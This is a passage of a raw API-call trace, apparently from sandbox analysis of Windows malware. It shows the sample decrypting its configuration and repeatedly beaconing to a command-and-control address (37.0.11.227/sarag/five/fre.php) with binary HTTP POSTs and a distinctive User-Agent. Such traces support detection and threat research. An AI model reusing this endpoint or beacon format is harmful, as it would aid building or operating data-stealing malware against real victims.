CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.434] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.434] GetProcessHeap () returned 0x690000 [0292.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0292.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.435] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0292.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.436] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0292.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.440] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0292.440] GetProcessHeap () returned 0x690000 [0292.440] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0292.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.441] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0292.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.442] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0292.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.443] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0292.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.456] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0292.456] GetProcessHeap () returned 0x690000 [0292.456] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0292.456] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0292.456] GetProcessHeap () returned 0x690000 [0292.457] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0292.457] GetProcessHeap () returned 0x690000 [0292.458] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0292.458] GetProcessHeap () returned 0x690000 [0292.458] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0292.458] GetProcessHeap () returned 0x690000 [0292.458] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0292.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.459] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.463] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0292.471] GetProcessHeap () returned 0x690000 [0292.471] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0292.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.472] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0292.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.473] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.474] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.474] GetProcessHeap () returned 0x690000 [0292.474] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0292.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.475] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0292.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.476] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0292.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.477] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0292.478] GetProcessHeap () returned 0x690000 [0292.478] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0292.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.479] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0292.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.480] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0292.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.481] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0292.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.482] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0292.482] GetProcessHeap () returned 0x690000 [0292.482] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0292.482] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0292.482] GetProcessHeap () returned 0x690000 [0292.482] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0292.482] socket (af=2, type=1, protocol=6) returned 0x960 [0292.482] connect (s=0x960, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0292.506] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0292.506] GetProcessHeap () returned 0x690000 [0292.506] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0292.507] GetProcessHeap () returned 0x690000 [0292.507] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0292.507] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0292.508] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0292.508] GetProcessHeap () returned 0x690000 [0292.508] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0292.509] GetProcessHeap () returned 0x690000 [0292.509] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0292.509] GetProcessHeap () returned 0x690000 [0292.509] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0292.509] GetProcessHeap () returned 0x690000 [0292.509] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0292.510] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0292.511] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0292.511] GetProcessHeap () returned 0x690000 [0292.511] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0292.511] GetProcessHeap () returned 0x690000 [0292.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0292.512] send (s=0x960, buf=0x6ad508*, len=242, flags=0) returned 242 [0292.512] send (s=0x960, buf=0x6aba40*, len=159, flags=0) returned 159 [0292.513] GetProcessHeap () returned 0x690000 [0292.513] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0292.513] recv (in: s=0x960, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0292.582] GetProcessHeap () returned 0x690000 [0292.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0292.583] GetProcessHeap () returned 0x690000 [0292.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0292.584] GetProcessHeap () returned 0x690000 [0292.585] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0292.585] GetProcessHeap () returned 0x690000 [0292.585] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0292.585] closesocket (s=0x960) returned 0 [0292.586] GetProcessHeap () returned 0x690000 [0292.586] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0292.586] GetProcessHeap () returned 0x690000 [0292.586] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0292.586] GetProcessHeap () returned 0x690000 [0292.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0292.587] GetProcessHeap () returned 0x690000 [0292.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0292.588] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17cc) returned 0x960 [0292.589] Sleep (dwMilliseconds=0xea60) [0292.591] GetProcessHeap () returned 0x690000 [0292.591] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0292.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.593] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.605] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0292.689] GetProcessHeap () returned 0x690000 [0292.689] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0292.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.697] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0292.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.698] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.699] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.699] GetProcessHeap () returned 0x690000 [0292.699] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0292.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.700] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0292.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.704] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0292.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.705] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0292.705] GetProcessHeap () returned 0x690000 [0292.705] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0292.705] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.706] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0292.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.706] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0292.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.707] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0292.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.708] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0292.708] GetProcessHeap () returned 0x690000 [0292.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0292.709] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0292.709] GetProcessHeap () returned 0x690000 [0292.709] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0292.709] GetProcessHeap () returned 0x690000 [0292.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0292.710] GetProcessHeap () returned 0x690000 [0292.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0292.710] GetProcessHeap () returned 0x690000 [0292.710] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0292.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.711] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.718] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0292.723] GetProcessHeap () returned 0x690000 [0292.723] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0292.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.724] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0292.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.725] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.726] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.726] GetProcessHeap () returned 0x690000 [0292.726] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0292.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.727] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0292.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.728] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0292.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.729] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0292.729] GetProcessHeap () returned 0x690000 [0292.729] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0292.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.730] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0292.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.731] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0292.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.732] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0292.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.733] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0292.733] GetProcessHeap () returned 0x690000 [0292.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0292.733] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0292.733] GetProcessHeap () returned 0x690000 [0292.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0292.733] socket (af=2, type=1, protocol=6) returned 0x964 [0292.733] connect (s=0x964, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0292.765] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0292.765] GetProcessHeap () returned 0x690000 [0292.765] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0292.765] GetProcessHeap () returned 0x690000 [0292.765] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0292.765] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0292.766] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0292.766] GetProcessHeap () returned 0x690000 [0292.766] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0292.766] GetProcessHeap () returned 0x690000 [0292.767] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0292.767] GetProcessHeap () returned 0x690000 [0292.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0292.767] GetProcessHeap () returned 0x690000 [0292.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0292.768] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0292.771] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0292.771] GetProcessHeap () returned 0x690000 [0292.771] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0292.771] GetProcessHeap () returned 0x690000 [0292.772] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0292.772] send (s=0x964, buf=0x6ad508*, len=242, flags=0) returned 242 [0292.773] send (s=0x964, buf=0x6aba40*, len=159, flags=0) returned 159 [0292.773] GetProcessHeap () returned 0x690000 [0292.773] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0292.773] recv (in: s=0x964, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0292.860] GetProcessHeap () returned 0x690000 [0292.860] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0292.860] GetProcessHeap () returned 0x690000 [0292.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0292.861] GetProcessHeap () returned 0x690000 [0292.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0292.861] GetProcessHeap () returned 0x690000 [0292.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0292.861] closesocket (s=0x964) returned 0 [0292.862] GetProcessHeap () returned 0x690000 [0292.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0292.862] GetProcessHeap () returned 0x690000 [0292.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0292.862] GetProcessHeap () returned 0x690000 [0292.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0292.862] GetProcessHeap () returned 0x690000 [0292.863] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0292.863] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17d0) returned 0x964 [0292.865] Sleep (dwMilliseconds=0xea60) [0292.870] GetProcessHeap () returned 0x690000 [0292.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0292.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.871] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.880] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0292.887] GetProcessHeap () returned 0x690000 [0292.888] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0292.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.890] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0292.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.891] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.893] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.893] GetProcessHeap () returned 0x690000 [0292.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0292.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.895] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0292.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.896] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0292.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.897] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0292.897] GetProcessHeap () returned 0x690000 [0292.897] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0292.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.898] StrStrA 